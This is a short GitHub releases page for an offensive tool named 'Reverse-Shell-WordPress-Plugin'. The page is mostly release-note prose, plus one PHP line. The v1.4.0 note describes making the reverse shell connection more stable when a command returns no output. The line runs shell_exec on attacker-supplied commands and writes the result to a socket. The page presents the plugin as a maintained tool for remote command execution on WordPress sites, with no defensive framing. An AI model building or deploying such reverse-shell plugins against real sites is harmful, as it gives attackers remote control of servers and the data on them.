Releases: 4m3rr0r/Reverse-Shell-WordPress-Plugin
Releases · 4m3rr0r/Reverse-Shell-WordPress-Plugin
v1.4.0
Fix: Handle null or empty command output in reverse shell connection
In this update, the reverse shell connection was enhanced to handle cases where the shell command produces null or empty output. Previously, this could have led to connection instability or crashes. The following changes were made:
- Null or Empty Output Handling: If the shell command does not return any output, a fallback message is now sent to the socket, preventing any connection issues.
$output = shell_exec($cmd); fwrite($sock, $output ?: 'No output from command.');